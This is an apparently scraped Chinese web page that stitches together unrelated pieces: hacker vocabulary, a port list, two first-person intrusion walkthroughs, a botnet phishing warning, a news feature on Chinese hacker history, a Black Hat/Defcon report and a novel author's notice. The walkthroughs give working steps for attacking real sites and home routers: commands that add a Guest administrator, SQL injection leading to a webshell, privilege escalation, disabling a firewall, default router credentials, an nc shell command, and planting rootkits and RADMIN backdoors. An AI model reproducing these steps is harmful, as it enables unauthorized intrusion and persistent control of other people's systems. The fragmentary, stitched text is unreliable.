将Guest的密码改为1234,或者你要设定的密码 12.C:\>netlocalgroupadministratorsguest/add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)。
|
1黑客英语 attack攻击 hacker黑客 exploit漏洞测试工具 Firlwall防火墙 Anti-Virus杀毒软件 Virus病毒 worm蠕虫 IDS入侵监测系统 security安全 tool工具 Trojan木马 DDOS拒绝服务攻击 sniffer嗅探,从中截取密码信息 sec-tool安全工具 SQL-injectionSQL注入,入侵网站常用 password密码 ID账号 Cracker破解,软件破解 File文件 Edit编辑 View查看 Open打开 Message消息 share共享 port端口 IP地址 Send发送 Select选择 Source资源 code代码 programming编程 WEB网站 ASP/PHP/JSP动态脚本语言 .NETFramework微软.NET框架 JAVA爪哇编程语言 Options配置 Connection连接 Proxy代理 Advanced高级 Start启动 Stop停止 Vmware虚拟机 Close关闭 Exit退出 2黑客英语99句 1tcpmuxTCPPortServiceMultiplexer传输控制协议端口服务多路开关选择器 2compressnetManagementUtilitycompressnet管理实用程序 3compressnetCompressionProcess压缩进程 5rjeRemoteJobEntry远程作业登录 7echoEcho回显 9discardDiscard丢弃 11systatActiveUsers在线用户 13daytimeDaytime时间 17qotdQuoteoftheDay每日引用 18mspMessageSendProtocol消息发送协议 19chargenCharacterGenerator字符发生器 20FTP-dataFileTransfer[DefaultData]文件传输协议(默认数据口) 21ftpFileTransfer[Control]文件传输协议(控制) 22sshSSHRemoteLoginProtocolSSH远程登录协议 23telnetTelnet终端仿真协议 24?anyprivatemailsystem预留给个人用邮件系统 25smtpSimpleMailTransfer简单邮件发送协议 27nsw-feNSWUserSystemFENSW用户系统现场工程师 29msg-icpMSGICPMSGICP 31msg-authMSGAuthenticationMSG验证 33dspDisplaySupportProtocol显示支持协议 35?anyprivateprinterserver预留给个人打印机服务 37timeTime时间 38rapRouteAccessProtocol路煞梦市? 39rlpResourceLocationProtocol资源定位协议 41graphicsGraphics图形 42nameserverWINSHostNameServerWINS主机名服务 43nicnameWhoIs‘绰号‘whois服务 44mpm-flagsMPMFLAGSProtocolMPM(消息处理模块)标志协议 45mpmMessageProcessingModule[recv]消息处理模块 46mpm-sndMPM[defaultsend]消息处理模块(默认发送口) 47ni-ftpNIFTPNIFTP 48auditdDigitalAuditDaemon数码音频后台服务 49tacacsLoginHostProtocol(TACACS)TACACS登录主机协议 50re-mail-ckRemoteMailCheckingProtocol远程邮件检查协议 51la-maintIMPLogicalAddressMaintenanceIMP(接口信息处理机)逻辑地址维护 52xns-timeXNSTimeProtocol施乐服务系统时间协议 53domainDomainNameServer域名服务器 54xns-chXNSClearinghouse施乐服务系统票据交换 55isi-glISIGraphicsLanguageISI图形语言 56xns-authXNSAuthentication施乐服务系统验证 57?anyprivateterminalaccess预留个人用终端访问 58xns-mailXNSMail施乐服务系统邮件 59?anyprivatefileservice预留个人文件服务 60?Unassigned未定义 61ni-mailNIMAILNI邮件? 62acasACAServices异步通讯适配器服务 63whois+whois+WHOIS+ 64coviaCommunicationsIntegrator(CI)通讯接口 65tacacs-dsTACACS-DatabaseServiceTACACS数据库服务 66sql*netOracleSQL*NETOracleSQL*NET 67bootpsBootstrapProtocolServer引导程序协议服务端 68bootpcBootstrapProtocolClient引导程序协议客户端 69tftpTrivialFileTransfer小型文件传输协议 70gopherGopher信息检索协议 71netrjs-1RemoteJobService远程作业服务 72netrjs-2RemoteJobService远程作业服务 73netrjs-3RemoteJobService远程作业服务 74netrjs-4RemoteJobService远程作业服务 75?anyprivatedialoutservice预留给个人拨出服务 76deosDistributedExternalObjectStore分布式外部对象存储 77?anyprivateRJEservice预留给个人远程作业输入服务 78vettcpvettcp修正TCP? 79fingerFingerFINGER(查询远程主机在线用户等信息) 80httpWorldWideWebHTTP全球信息网超文本传输协议 81hosts2-nsHOSTS2NameServerHOST2名称服务 82xferXFERUtility传输实用程序 83mit-ml-devMITMLDevice模块化智能终端ML设备 84ctfCommonTraceFacility公用追踪设备 85mit-ml-devMITMLDevice模块化智能终端ML设备 86mfcobolMicroFocusCobolMicroFocusCobol编程语言 87?anyprivateterminallink预留给个人终端连接 88kerberosKerberosKerberros安全认证系统 89su-mit-tgSU/MITTelnetGatewaySU/MIT终端仿真网关 90dnsixDNSIXSecuritAttributeTokenMapDNSIX安全属性标记图 91mit-dovMITDoverSpoolerMITDover假脱机 92nppNetworkPrintingProtocol打印协议 93dcpDeviceControlProtocol设备控制协议 94objcallTivoliObjectDispatcherTivoli对象调度 95supdupSUPDUP 96dixieDIXIEProtocolSpecificationDIXIE协议规范 97swift-rvfSwiftRemoteVirturalFileProtocol快速远程虚拟文件协议 98tacnewsTACNewsTAC(东京大学自动计算机?)新闻协议 99metagramMetagramRelay 3黑客攻防实战之对有防火墙网站入侵过程 前几天群里的兄弟给了一个网站,问我可不可以入侵。 一、踩点 ping111.com发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。 二、注入 从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。 三、提升权限 先看哪些特权的: cscriptC:\Inetpub\AdminScripts\adsutil.vbsget/W3SVC/InProcessIsapiApps 得到: Microsoft(R)Windows脚本宿主版本5.1forWindows 版权所有(C)MicrosoftCorporation1996-1999.Allrightsreserved. InProcessIsapiApps:(LIST)(5Items) ‘C:\WINNT\system32\idq.dll‘ ‘C:\WINNT\system32\inetsrv\httpext.dll‘ ‘C:\WINNT\system32\inetsrv\httpodbc.dll‘ ‘C:\WINNT\system32\inetsrv\ssinc.dll‘ ‘C:\WINNT\system32\msw3prt.dll‘ 把asp.dll加进去: cscriptC:\Inetpub\AdminScripts\adsutil.vbs set/W3SVC/InProcessIsapiApps‘C:\WINNT\system32\idq.dll‘‘C:\WINNT\system32 \inetsrv\httpext.dll‘‘C:\WINNT\system32\inetsrv\httpodbc.dll‘‘C:\WINNT\system32 \inetsrv\ssinc.dll‘‘C:\WINNT\system32\msw3prt.dll‘‘c:\winnt\system32 \inetsrv\asp.dll‘ 然后用asp木马加个用户,显示命令完成。 四、TerminalService 接下来就是开3389了,用netstart显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat-an察看了一下,发现有3389,再从netstart里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的方法大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCPtunnelforHTTPProxies)大家有兴趣的话可以去试一下,它可以穿透http代理。 五、简单后门 1.改了FSO名,这样是让我自己享受,这个有system权限的马儿。 2.放了几个rootkit和几个上少见的后台。 3.我个从是不喜欢多放后台,觉得很烦。 六、Sniffer 1.TS界面下,下载了些嗅探器。先ARPsniffer图形的看了一下,晕死,没有一台内网机子。又看了一个外网,晕死,整个IP段都是。看来我的运行不错嘛,打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了。 4黑客如何穿透ADSL路由入侵内网 也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSLMODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。 一.扫描 现在很多ADSLMODEM都是通过80、23、21三个端口来管理,但80、21端口有很多服务器都有打开,没什么特征性,于是我选择了23端口。打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了。开23的主机还真不少,我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSLpass:adsl1234(因为我这里的adslmodem一般是华硕的,缺省是adsladsl1234),好了,一矢中的,现在我就是上帝。 二.映射 入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是192.168.1.2到底开放了什么端口,我们根本就不知道啊。呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上,我们访问ADSLMODEM就等于访问主机192.168.1.2了。 三.检测漏洞 现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139、1433等,刚才只是开放了80、23、21而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低啊。 四.溢出 既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80、21也就webdav.sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行 五.募然回首,那人却在,灯火阑珊处 看来这个管理员还是比较负责的,该打的补丁都打上了。这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是: nc-v-l99sql2218.xxx.xxx.xxx0218.xxx.xxx.xxx99 这样就成功得到一个shell了。 六.设置后门 到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。 5黑客利用伪造邮件构建僵尸 什么是僵尸? 僵尸是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序),从而在控制者和被感染主机之间所形成的一个可一对多控制的。在Botnet的概念中有这样几个关键词。“bot程序”是robot的缩写,是指实现恶意控制功能的程序代码;“僵尸计算机”就是被植入bot的计算机;“控制服务器(ControlServer)”是指控制和通信的中心服务器。 僵尸首先是一个可控制的,这个并不是指物理意义上具有拓扑结构的,它具有一定的分布性,随着bot程序的不断传播而不断有新位置的僵尸计算机添加到这个中来。其次,这个是采用了一定的恶意传播手段形成的,例如主动漏洞攻击,邮件病毒等各种病毒与蠕虫的传播手段,都可以用来进行Botnet的传播,从这个意义上讲,恶意程序bot也是一种病毒或蠕虫。最后一点,也是僵尸的最主要的特点,就是可以一对多地执行相同的恶意行为,比如可以同时对某目标网站进行分布式拒绝服务(DDos)攻击,同时发送大量的垃圾邮件等,而正是这种一对多的控制关系,使得攻击者能够以极低的代价高效地控制大量的资源为其服务,这也是Botnet攻击模式近年来受到黑客青睐的根本原因。在执行恶意行为的时候,Botnet充当了一个攻击平台的角色,这也就使得Botnet不同于简单的病毒和蠕虫,也与通常意义的木马有所不同。 黑客如何利用补丁邮件? 目前,有黑客利用伪造的微软补丁邮件构建僵尸,因此请广大的网民确认收到的有关于微软补丁的邮件,并弄清楚您到底下载了什么到自己的计算机中。互联网风暴中心(InternetStormCenter)指出,黑客正在基于微软的安全更新伪造恶意电子邮件,这种伪造的邮件不能给用户提供任何有用的安全补丁,而实际上在邮件提供的链接或者附件中包含了恶意代码,那些没有警惕性的用户在点击了这些链接后即下载了恶意程序到自己的主机中。 实际上,对微软的安全补丁稍微留意的用户就会知道,微软是从来不会通过电子邮件的形式来通告用户安装安全更新补丁的,微软都是以安全公告的形式在其安全中心主页上(http://microsoft.com/china/technet/security/default.mspx)发布安全信息的。通过这种伪造的邮件中,以安全补丁下载到的应用程序,实际上是一个后门木马,即在上面提到的bot程序。受这种木马影响的机器,将会被黑客远程的控制,受影响的机器至此就加入了僵尸。伪造邮件的黑客非常聪明,他们在受害者的姓名或者公司的名字里加入超级链接,链接到木马程序。到目前为止,安全研究人员已经发现了4种均是指向木马程序的不同的URL地址。在黑客伪造的邮件中,其中有封信的原文如下: “由于您使用了微软的软件而收到这封邮件,我们是通过你提交给‘微软Windows更新’的邮件列表中 获得您的电子邮件地址的。一个0day漏洞(未公布的漏洞)已经在上流传开来,该漏洞将影响那些 使用MICROSOFTOUTLOOK的用户。成功利用该漏洞后,黑客能够完全控制您的机器。 (此处是一个补丁的链接地址)” 当大家收到类似的E-mail时,请提高警惕。处在,安全事件四起的今天,请广大的网民一定要注意自身的计算机安全。 6“中国黑客”10年嬗变 “熊猫烧香”在上猖狂,不少用户被染上病毒,安全在次敲响警钟。刘军/图 刺刀还在,理想已经滑落——“中国黑客”10年嬗变 作者:南方周末记者朱红军实习生李响发自上海 在中国短暂而一度喧嚣的黑客历史上,几乎从没有过纯粹的时光,它一再被捆绑和裹胁,最先是爱国精神,然后是商业利益,现在则几成犯罪的代名词 六年前,“中国鹰盟”成立之初,黑客万涛吟咏着“我们要做民族的精英,我们会永远战斗不息”,他的经典台词是为刺刀装上理想,像拿破仑的军队那样。 现在,2007年9月11日,远在成都出差的中年白领,惦记着夜晚的宵夜,然后悲哀地承认,如今的黑客圈是“名利场和大染缸”,他宁愿选择“永远缅怀”。 龚蔚,十年前成立中国第一个黑客组织——“绿色兵团”,如今甚至都已不愿轻言往事,“那是一段成长的历史”,他说自己反思过,检讨过,再无重温的激情,江湖也早无goodwell(网名)。 尽管源于上世纪60年代美国的“黑客”(Hacker)一词,最初的含义只关乎技术,指那些尽力挖掘计算机程序的最大潜力的电脑精英,但在中国短暂而一度喧嚣的黑客历史上,几乎从没有过纯粹的时光,它一再被捆绑和裹胁,最先是爱国精神,然后是商业利益,现在则几成犯罪的代名词。 “当你企图用文化去解构技术,它也许会发展成科学,也许会发展成巫术。”老牌黑客alert7说。 十年回首,那些曾经公开宣扬爱国,并在印尼排华、中美撞机等一系列历史事件中成功实施跨国攻击的黑客组织们,譬如绿色兵团、中国黑客联盟、红客联盟,大多风云流散,或者名存实亡。 当年的黑客教父,要么在商业的泥潭里泥足深陷,要么已悄然归隐,取而代之的是汹汹而来的以牟利为动机的新一代伪黑客、骇客们,以及日益攀升的有关黑客犯罪的冰冷数据。 这就是残酷的现实,正如万涛所说,刺刀还在,思想已经滑落。 那绿色和平的家园! 在世界头号黑客凯文·米特尼克因为非法侵入政府网站而入狱整整两年后,中国才诞生了第一个真正意义上的黑客组织。 1997年,上海黑客龚蔚(goodwell)在境外某网站申请了一处免费空间并在国内做了镜像站点,用于黑客之间的交流,成立“绿色兵团”。 发起人龚蔚如今的解释是,一切出于爱好和兴趣,当然还有同道切磋比拼的快感。“与利益无关,与政治无关”。 绿色兵团的名字,来源于他美好的,“以兵团一般的纪律和规则,打造绿色和平的世界”。 1998年仅一年,阵容便趋于鼎盛,龚蔚回忆说,注册人数不下5000人,核心团队有一百多人,分布在湖南、福建、广东、北京、上海各地,这包括如今已被尊称为教父级的rocky、solo、小鱼儿、冰河、小榕、谢朝霞等等。 彼时的中国互联网还在起步间,对于普通人还是个陌生的名词,商业利益无从谈起,这得以令一帮沉醉于挑战技术的爱好者,纯净地栖居。 他们中一些是二十出头的大学生,初衷简单,甚至没有自己的电脑,有时为了争夺校园实验室里的机位而废寝忘食。 他们信守自己的黑客准则,甚至崇拜雷锋,主张技术共享、互助,耻于随意的攻击,遑论以之牟利? 绿色兵团的早期成员冰河(glacier)说,完全是*自己的兴趣和网友的鼓励,才写出了中国最早的特洛伊木马程序,他最初只是想编写一个方便自己的远程控制软件。从不曾想竟成为之后中国最受诟病的黑客攻击软件。 后来的黑客组织“第八军团”的陈三公子,当时还只是个“菜鸟”,他说,黑客有黑客自己的行为准则,有自己的道德规范,正义、平等、共享、互助,“这是一种追求卓越和完美的精神”。 红客,民族的红色! 纯净的时光总是倏忽而逝,绿色兵团一位早期黑客现在说,再也不会回来了。 1998年5月,印度尼西亚发生排华事件。正蹒跚学步的中国黑客们决定声援,并向印尼网站发起攻击。这成全了他们第一次在公共视野的亮相,并且携爱国义举一呼百应。 组织者绿色兵团名噪一时,年轻的黑客们初尝被视为民族英雄的自豪。 当年的组织者龚蔚现在承认,一是民族情绪使然,再则不排除年轻人的出名冲动。 如今,谢朝霞甚至说,当时受了鼓动——鼓动显然不是褒义词。他行事低调,百般推辞采访,并拒谈任何个人情况。 最初江湖规则,尚被遵守,“我们留真名,只为表明我们的态度,不去窃取资料,也不恶意破坏对方设备。”龚蔚说。 朴素的爱国情绪造就了中国黑客最初的团结与坚强的精神,甚至出现了“中国黑客紧急会议中心”,负责对外国网站攻击期间的协调工作。 之后便是1999年的北约轰炸中国大使馆,中国黑客又一次大规模地团结起来,纷纷开展了对美国网站的攻击。在中国大使馆被炸后的第二天,第一个中国红客网站,“中国红客之祖国团结阵2001年,中美黑客大战,8万中国黑客一起行动,使中国红旗在美国白宫网站飘扬两个小时。他们自称“卫国战争”。 中国红客联盟、中国鹰派联盟、中国黑客联盟三大黑客组织成为这场中美黑客大战的主力军。一时间,红盟的lion、鹰派的万涛成为中国黑客英雄。 前者宣扬红客精神,给自己起了个独特的名字——“红客”?(Honker),希望以政治立场的正义性来证实自己攻击行为的合法性。 真实动机的揣测已经不重要,客观上,对于民族情绪的附庸,以及爱国旗帜的高扬,促成了中国黑客的急速成长。2000年的街头,黑客技术就像今天的blog(博客)一样流行。“报效祖国”成为年轻触网者最惯常的口头禅。 2002年4月,中国互联网协会公告制止有组织的攻击行为。红盟至此一蹶不振,只沦为少人问津的网页。而滔滔直下的安全产业,令昔日的黑客们竞相转型,别无他顾。 “在根本意义上,黑客所采取的手段和大学生对美国大使馆扔石头和墨水瓶没有什么两样,只是一种宣泄的手段。”中国社科院教授闵大洪曾一针见血地评价。 “时代变了,环境变了,也变了,”绿色兵团当年一成员感慨红色激情转瞬即逝的原因,“黑客又怎么能不变?” 大规模的以民族主义为名的攻击再难开展。2004年最后一天,中国红客联盟首领Lion宣布闭站,闵大洪教授撰文宣告告别中国黑客的激情时代。 商业迷梦 纯技术的理想也好,爱国的激情也罢,结果证明,在泡沫泛起、创业诱惑迭现的2000年前后,中国的黑客们变得脆弱。原本隐秘的江湖,出于商业的需要,也不可避免地驶向浮华和炫耀。 “回到现实,黑客们也是普通人,也需要吃饭,生活和个人发展。”早期绿色兵团的成员周帅不主张道德评价。 而第八军团的组织者陈三公子至今仍坚持,“合法地利用黑客技术,将它转化为合法的商业价值,我相信这也许就是众多黑客们体现自己价值的最高境界。” 1998年始出现的一系列的攻击行动,客观上也提醒了国人对于安全的认识,安全行业方兴未艾。 1999年,中国最早也是一度最强大的黑客组织绿色兵团纵身转型,脱胎为中绿联盟,当年7月成立了上海绿盟计算机安全技术有限公司。 随后,中国第一代黑客们纷纷扔掉利剑,举起盾牌,成群结队向安全领域进军。 “当时中国最顶尖的黑客人才,90%变身为了安全专家。”龚蔚说。 这些黑客教父昔日轻而易举地以爱国、民族旗帜一举成名,却不想,在商业的泥潭里,泥足深陷。 商业的迷梦,只消一年便告完结。2000年,上海绿盟即告解散。 龚蔚现在似乎有些后悔,绿色兵团风云四散,不仅仅是个人利益得失,更重要的,他以为,打开了商业资本的魔盒,终于侵蚀了本该纯净的黑客理念。而他被视为那个打开潘多拉魔盒的人。 周帅似乎显得早有预见,他说,自己从没有向安全领域迈进一步。 绿盟的失败,被如今的当事人解释为,尊奉的黑客自由理念与商业资本产生了冲突,这可能包括“安全公司赢利迫切,名为防卫,但难免要做一些攻击行动,打着法律的擦边球,以求业务的提升”。 不能容忍者选择逃离,而被资本俘获的却可能是大多数。 而另一部分人,比如万涛在寻找着其他可能,2002年他通过媒体回应当时的广东省长,中国黑客愿为政府服务。他曾经多么郑重地呼吁黑客的责任意识,甚至用上了最流行的“中国特色”的前缀。只可惜,未得实质回应。 “中国黑客的大联盟时代已经过去,现在是一盘散沙。”周帅说。 回头太难 的普及速度,比想象中要快,而黑客繁衍的速度或许比普及的速度还要快。 当黑客工具可以如此直接地带来商业利益,可以视为一种产品创造经济数据的时候,精英小众化的面纱便不复存在。 2000年之后,中国的所谓黑客队伍迅速扩大,众多唾手可得的黑客工具与软件使得进入黑客的门槛越来越低,间随处是黑客速成培训班,当300元钱就可以攻破一个邮箱,换回一套傻瓜黑客工具时,混乱已经无法避免。 甚至当年的黑客对这个称谓也惟恐避之不及,“太复杂了”是紧跟的喟叹。 龚蔚回过头来要重新捍卫作为黑客的纯洁性。万涛说,黑客应该是有道义、有良知的技术高手,他与骇客的区别是在进入别人的计算机以后,一个是善意提醒或悄然离开,而另一个则大肆破坏。 “这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。” 还有人偶尔会说起红客,一个曾经以民族、爱国立身的词汇,据说Lion又重新开起了红客联盟,可惜悄无声息的网站上,他自己都一个月没有登陆了。熟悉他的朋友说,他活得很滋润。 再比如另一个“大红客联盟”,实际上只是一个代号了,他操心的是自己十几人的安全公司,甚至一将黑客与国家利益联系在一起,他本能地会问,“不敏感吗?” 更多的对于民族主义渲染,已经悄然变成了黑客网站揽钱广告上的一句经典台词,“一个月包会攻击日本电脑”。 陈三公子说,现在只有极少数仍然坚持黑客本色,默默地专注于技术研究,而另一部分闹得沸沸扬扬,其实是专注于商业利益。他亦曾被如此揣度。 “他们不是以技术为目的,而是以金钱为目的,他们在扭曲了黑客的同时,亦为社会埋下了众多不安全隐患。” 万涛说,看多了打着爱国幌子招摇撞骗的黑客,他最后的结论很悲伤,“和娱乐圈里的明星一样,绯闻是其花絮,注意力、快感和财富是其最终的归宿。” 龚蔚觉得,黑客世风日下,绿色兵团甚至难辞其咎,因为他们的失身下海,才造成了黑客精神被割断。他孜孜以求想建立一个大基金会,不涉相关的运作,重新回归到“绿色和平的世界”,“goodwell,不应该只属于一个人”。 他自己并不清楚,还有谁会放弃名利,愿意回归,也偶尔会觉得幼稚,但“总得试试吧”。 7从全球两大黑客年会看攻击趋势 要认识现今黑客功力,每年7月陆续在美国举办的全球两大黑客活动──黑帽大会(BlackHat)与Defcon,就是见识顶尖黑客大显身手的好时刻。今年会议上,黑客们不仅试图入侵现场ATM提款机、无线装置,亦探讨安全、NAC安全性、后门程序入侵及VoIP与行动装置等安全议题。 鉴识工具不是万能 企业被黑客入侵后,重要的是必须要能够追踪黑客的踪迹,并做好数字证据的保留与鉴识工作,进一步做为法庭的呈堂证供。因此,常用的数字鉴识工具,多是以稳定著称。这一次在黑帽大会上,便有研究单位iSec的研究员宣称,已经针对目前政府部门和警政单位常用的EnCase鉴识工具,进行反鉴识工具的研究。 此次是第三次参加黑帽大会和DefCon的中华电信数据分公司资安办公室技术研发组组长李伦铨,也对这一场技术论坛印象深刻。他进一步指出,iSec其实就是利用鉴识工具本身的软件漏洞,将可能造成鉴识结果失效或错误。「虽然这项研究结果,已经遭到鉴识工具厂商的驳斥,但能够做出这样的心得分享,必须累积长时间的资安研究能量,」李伦诠说,这也是目前台湾包括资安厂商和黑客组织在内,共同面临资安研究人才断层的问题。 找漏洞的套装工具渐齐全 资安问题大致可分成两类,一类是系统内部,例如Rootkit隐藏的问题;另外一种是新弱点、漏洞的发现,可透过逆向工程或Fuzzy手法,找出问题所在。此次黑帽大会上,行政院研考会技术服务中心(简称技服中心)工程师方家庆、陈鸿吉,两人不约而同看到,以往找漏洞的工具,有逐渐变成套装工具的趋势。 专精Rootkit研究的方家庆观察到,「不论是黑帽大会或是DefCon,利用Fuzzy手法找出软件漏洞,在今年看来已经成熟,」已有厂商开发一套架构,将Fuzzy常用组件整合成产品,可针对不同软件找漏洞。 擅长逆向工程的陈鸿吉,在黑帽大会上则观察到,透过逆向工程手法找寻软件漏洞,仍是破解软件的方式,已有厂商开发出,同时整合逆向工程与Fuzzy手法、协助分析的软件工具。这也意味着,这类型软件工具有走向整合性的趋势。 无线依然不安全 无线的便利造成普及,但相对的,其安全性,依然是最痛。不论是黑帽大会或是DefCon,现场其实都有提供无线的服务,由于参加两大黑客会议的成员,多数具有相关技术底子,但对于会场提供无线的安全性,依旧充满不信任感。 最明显的例子就是,在DefCon现场展示的「绵羊墙(WallofSheep)」。数联资安技术处经理杨伯瀚指出,绵羊墙就是在DefCon会场上,以部分马赛克方式,将监听到的账号、密码投射在这面绵羊墙上。「这也证明,无线的确仍有很高的风险性,」杨伯瀚说。 除了绵羊墙外,由黑客组织Chroot自行组队参加DefCon的成员曾信田(NewBug)则指出,此次同行的团员中,便有一名无线的真实受骇者。他进一步表示,团员DM一到DefCon现场,刚把CHT9100手机打开,就遭到现场黑客入侵,系统画面被置换。曾信田笑说,「DefCon现场环境的险恶,由此可知。」 NAC可用P2P手法破解 今年DefCon仍很重视Web本身的漏洞,不论是新的SQLInjection(SQL注入攻击)手法,或者是Web软件的新弱点、新的网站检测工具,甚至是利用社交工程手法,进一步做到XSS(跨站脚本)攻击,都是很明显的趋势,其中在会场示范的MySpace攻击,就是最好的例证。其它的,除了VoIP以及行动装置的安全性,各种后门程序植入手法与Vista安全性,也都是关切议题。 不过,许多资安厂商推动相当热烈的NAC(存取控管),向来被认为可以有效遏止企业资安环境的恶化,并落实企业资安政策。但杨伯瀚发现,此次有演讲者透过P2P技巧(以TOR为主),躲过防火墙的侦测。他进一步指出,这样的手法,以往常用于中国大陆网友,是一种可以躲避中国官方箝制的技巧,一山还有一山高,原本单纯躲避政府侦察的技巧,也成为黑客可用来躲避NAC的新手法。 Google在黑帽大会现场征才 型态较为严肃的黑帽大会,受邀对象或参展厂商,多数较为正式,而软件厂商Google也首度在黑帽大会摆摊位参展。不过,Google参展不是为了推销产品,「是为了在黑帽大会,网罗优秀的资安人才,」李伦铨说道。 Google传单中人才招募需求,其中有一项需求颇耐人寻味,「CISSPnotrequired。Relevantexperiencemustbehands-on!」李伦铨指出,从Google征才的条件发现,「Google要的不是会考试、有证书的人才,实务经验才是王道。」李伦铨说,这也意味着,专业黑客的手法与攻击变形,已经让许多擅长「说明攻击」而非「实作攻击」的嘴炮型黑客,招架不住。 现场领略信息战的威力 DefCon是一个囊括资通安全、实体安全及电子学等泛安全的聚会,像是实体安全上的开锁教学和比赛;或者是设计枪靶,看哪一把由计算机控制的玩具枪、BB弹,射击率最精准等,则运用大量的电子学。 杨伯瀚在现场,第一次感受到「信息战」的威力。此次有一名协助爱沙尼亚共和国做数字鉴识的演讲者,便还原该国遭到俄罗斯黑客攻击的真实状况。波罗的海三小国的爱沙尼亚,1991年从苏联独立出来,是一个信息化程度相当深的国家,银行相当普遍,「连买菜,都可以在上进行,」杨伯瀚转述说道。但爱沙尼亚与俄罗斯之间,有严重的政治冲突,先前有俄罗斯黑客号召俄国网友,针对爱沙尼亚重要的服务与网站等,发动DDoS(分布式阻断式服务)攻击。 爱沙尼亚虽然有国家级的防火墙,但从俄罗斯来的大量DoS攻击,仍瘫痪了爱沙尼亚的国家运作。为了恢复国家运作,爱沙尼亚中断所有从国外到该国的联机,启动国家级第二线备援线路,慢慢恢复基本国家运作机制;同时向欧盟、俄罗斯与美国的CERT求援,并协助进行事后的数字鉴识。杨伯瀚说,「如果台湾遭遇到类似的攻击,相关部门,是否有足够能力可以应付呢?」 ATM岌岌可危,WarGame高手云集 不论是黑帽大会或者是DefCon,此次台湾参加的成员,也有观察到一些有趣的场边花絮。技服中心工程师陈鸿吉在黑帽大会上,刚好遇到有一小群黑客,企图针对会场的自动柜员机(ATM)进行攻击,ATM甚至已经出现微软的画面,也出现一些命令列等,只不过,在现场警卫的干预下,这样的攻击手法没有完成。随着有越来越多银行ATM为了提供更多元的服务但,从专属系统陆续改成开放式的Windows-Based的ATM,「这也让人对于ATM的安全性,捏了一把冷汗。」陈鸿吉说。 DefCon另外的特色就是有WarGame以及各式各样有趣的现场活动。台湾黑客组织Chroot原本有意自行组队参加DefCon,但在会前赛中只取前13名,整体成绩名列第十四名Chroot与比赛机会擦身而过。但曾信田到DefCon现场发现,每一个入围WarGam队伍,所有的设备,包含服务器、设备等,都带得非常齐全,「如果Chroot有入围,在缺乏好的工具情况下,可能会被其它参赛队伍打着玩。」他说这一面绵羊墙,就是DefCon会场所有被监听到的账号、密码,都被投影在这面墙上Chroot黑客组织成员DM,一到DefCon现场,CHT9100手机一开机,就被现场黑客入侵、画面被置换。
|
《黑客邪医》自从十一月上传至今,历时将近三月之久,在元月25号(即今天下午四点左右),终于迎来了VIP上架销荐的机会。 这次上架销售来之不易,既与本人三个月来孜孜不倦的写作,也与喜爱本人的兄弟们的一贯支持分不开。在这儿,本人真诚地说声谢谢,没有兄弟们的支持,也就没有《黑客邪医》今天的成绩。 别的话也不多说了,虽然天寒地冻,但兄弟们支持的火热的心意小九深深地感受到。希望有条件的兄弟请订阅支持一下,没条件的兄弟还请继续支持公众版,一到时间就会解禁。 再一次谢谢兄弟们的支持,拜首!! |
|
||||||||||||||||||
感谢作者的发布,作品本身仅代表作者本人的观点,与本站立场无关。阅读者如发现作品内容确有与法律抵触之处,可向本站举报。 Waner.Net All rights reserved. Copyright © 2000-2006 Power By waner |